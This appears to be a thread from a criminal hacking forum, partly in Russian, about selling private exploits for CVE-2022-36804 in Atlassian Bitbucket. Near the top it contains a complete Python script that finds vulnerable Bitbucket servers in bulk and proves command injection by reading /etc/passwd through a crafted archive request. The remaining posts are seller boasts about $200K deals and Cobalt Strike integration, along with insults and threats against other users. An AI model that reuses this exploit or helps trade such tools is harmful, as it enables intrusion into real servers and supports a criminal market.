Обсуждение продажи CVE-2022-36804 (Atlassian Bitbucket exploit) и прочих эксплойтов

[grader]

Можно узнать цену? в пм игнор (странно)

Я не знаю принято ли так, но

import requests
import urllib3
import sys
urllib3.disable_warnings()


def run(target):
    try:
        projects_response = requests.get("https://"+target+"/rest/api/latest/projects", verify=False).json()["values"]
        command = "cat%20/etc/passwd"
        for item in projects_response:
            project = item["key"]
            repos_response = requests.get(
                f"https://" + target + f"/rest/api/latest/projects/{project}/repos", verify=False).json()["values"]
            repos = [item["slug"] for item in repos_response]
            for repo in repos:
                if check(target, project, repo):
                    return "\033[92m[+] VULNERABLE     | " + target + " | https://" + target + "/rest/api/latest/projects/" + project + "/repos/" + repo + f"/archive?filename=aaa&path=aaa&prefix=ax%00--exec=%60{command}%60%00--remote=origin \033[0m"
        return "[-] NOT-VULNERABLE | " + target
    except:
        return "[-] NOT-VULNERABLE | " + target


def check(target, project, repo):
    try:
        command = "cat%20/etc/passwd"
        response = requests.get(
            "https://" + target + "/rest/api/latest/projects/" + project + "/repos/" + repo +
            f"/archive?filename=aaa&path=aaa&prefix=ax%00--exec=%60{command}%60%00--remote=origin", verify=False)
        resp_json = response.json()
        return "root:x" in resp_json["errors"][0]["message"]
    except:
        return False


def main():
    for target in sys.stdin:
        print(run(target.strip()))


if __name__ == "__main__":
    main()

чем плох?

 

[grader]

Thanks for the reply about implementations. Now i know u write GUI stable version witch can be usefull for сobalt strike users. Wish: Don't forget to write about it because otherwise it looks like you are selling already public shit.

 

[johndoe7]

Actual.

I see there are very dumb motherfuckers in general who don't understand that there is a big difference between what is in public and what is a private implementation of an exploit. Actually the existence of such dumb motherfuckers is meaningless! The scum is commenting here and there on the forum, mentioning my account and threads - such scum when I find in real life is exterminated!

Exploits are private implementations. Come through a private tool. Also with GUI for convenience.

I have $200K+ deals only with the Garant on Exploit which is only a very small part of actual deals as most deals are direct - but I mention only this $200K because it is documented and can be checked. All my tools are private, high-quality tools used by legitimate red teams.

Contact with PM.

 

[malloy05]

Actual.

I see there are very dumb motherfuckers in general who don't understand that there is a big difference between what is in public and what is a private implementation of an exploit. Actually the existence of such dumb motherfuckers is meaningless! The scum is commenting here and there on the forum, mentioning my account and threads - such scum when I find in real life is exterminated!

Exploits are private implementations. Come through a private tool. Also with GUI for convenience.

I have $200K+ deals only with the Garant on Exploit which is only a very small part of actual deals as most deals are direct - but I mention only this $200K because it is documented and can be checked. All my tools are private, high-quality tools used by legitimate red teams.

Contact with PM.

I don't understand, you don't sell publick exploit?
I saw the same exploits on GitHub.
Or you find other vulnerabilities?
Can you explain more?

 

[pepel]

Can you explain more?

for example (sorry TS):

Спойлер

Public code:

print("Hello world")

Priv8 Implementation by johndoe7

from threading import Thread

a = 'l'
b = 'o'
c = 'He' + a*2 + b
d = 'W' + b + 'r' + a + 'd'

def print_impl(string: str) -> None:
    print('[' + '=' * 17 + ']')
    print('[AMAZING PRIV8 GUI]')
    print('[CO-CO-BLAT STRIKE]')
    print('[' + '=' * 17 + ']')
    print(string.center(19))
    print('[' + '=' * 17 + ']')
    print('[200k MUTHAFUCKERS]')
    print('[' + '=' * 17 + ']')

Thread(
    target=print_impl, 
    args=(f'{c} {d}',)
).start()

 

[abruptum]

I don't understand, you don't sell publick exploit?
I saw the same exploits on GitHub.
Or you find other vulnerabilities?
Can you explain more?

взял паблики, прикрутил gui. оппа)

 

[malloy05]

взял паблики, прикрутил gui. оппа)

Хелоу ворлд
Так и заработал на деп в 200к$ по его словам на соседнем форуме деп в 200к

 

[johndoe7]

Fucking trash! Are there no moderators in this forum to remove this retarded trash?

I say that I have $200K+ deals with the Exploit Garant (something that can always be checked with the Garant there) and the retarded clown pours the shit that I have $200K dep - that's called a retarded clown! In real life such scum perishes! Trash!

Clowns - some of them 10+ years on these forums and still cannot earn even $1K! Go all over the forum and pour the shit that you can find everything in the public domain! Like for something you can maybe Google 6 hours and ultimately find how to do it or buy it with $1K already done - and in the next 6 hours I can make $10K! Retarded clowns will go and pour the shit that they are so smart to have saved $1K! - but ultimately they are totally incapable of earning something!

взял паблики, прикрутил gui. оппа)

What fucking scum?! GUI is actually quite important - ask why there exists something like Metasploit Pro! But these clowns don't know because they have never actually got to the point of actual work and making money. Everyone who actually does something knows very well how important time is and the ability to focus on the important things and see the whole picture and not lose time and got asleep but get things done!

As for this thread: people receive EXACTLY what is explained in the thread, nothing is hidden or exaggerated. And I have a lot of deals on the Exploit forum and some here and never had a problem with someone who bought. The exploits are private - private implementations, not public code - and stupid shit that doesn't understand the difference that alternative implementations make, well they are just stupid shit! Any normal person who works with these things can remember how people were seeking different implementations of the Bluekeep exploit for example - and there were at least two popular alternatives - from Metasploit and from Immunity CANVAS - and people were searching hard for the CANVAS alternative! Also the exploits come with GUI and other options that make it convenient to work - for example the ability to pass easily sessions to and from Cobalt Strike, and many others as well. Fucking scum! - what super-duper I say? What? What I explain in this thread is exactly what people receive when they buy! Fucking trash!